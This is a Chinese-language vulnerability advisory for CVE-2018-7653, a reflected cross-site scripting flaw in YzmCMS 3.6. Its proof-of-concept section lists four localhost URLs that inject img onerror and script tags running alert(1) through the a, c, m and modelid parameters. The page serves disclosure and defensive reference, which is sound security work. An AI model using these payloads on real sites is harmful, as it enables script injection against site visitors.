CVE中文申请站

一、漏洞摘要

漏洞名称: YzmCMS 3.6存在XSS漏洞
上报日期: 2018-04-05
漏洞发现者: zzw (zzw@5ecurity.cn)
产品首页: http://www.yzmcms.com/
软件链接: http://www.yzmcms.com/
版本: 3.6
CVE编号: CVE-2018-7653


二、漏洞概述

YzmCMS 3.6版本的 index.php页面a、c、m参数过滤不严格可导致跨站脚本漏洞。

三、利用代码

poc代码:
poc:

http://localhost/YzmCMS/index.php?m=search&c=index&a=initxqb4n%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecu9rs&modelid=1&q=tes 
 
http://localhost/YzmCMS/index.php?m=search&c=indexf9q6s%3cimg%20src%3da%20onerror%3dalert(1)%3ej4yck&a=init&modelid=1&q=tes 
 
http://localhost/YzmCMS/index.php?m=searchr81z4%3cimg%20src%3da%20onerror%3dalert(1)%3eo92wf&c=index&a=init&modelid=1&q=tes 
 
http://localhost/YzmCMS/index.php?m=search&c=index&a=init&modelid=1b2sgd%22%3e%3cscript%3ealert(1)%3c%2fscript%3eopzx0&q=tes


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/26/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7653
exploit-db:https://www.exploit-db.com/exploits/44405/
MISC:https://packetstormsecurity.com/files/147065/YzmCMS-3.6-Cross-Site-Scripting.html

标签: none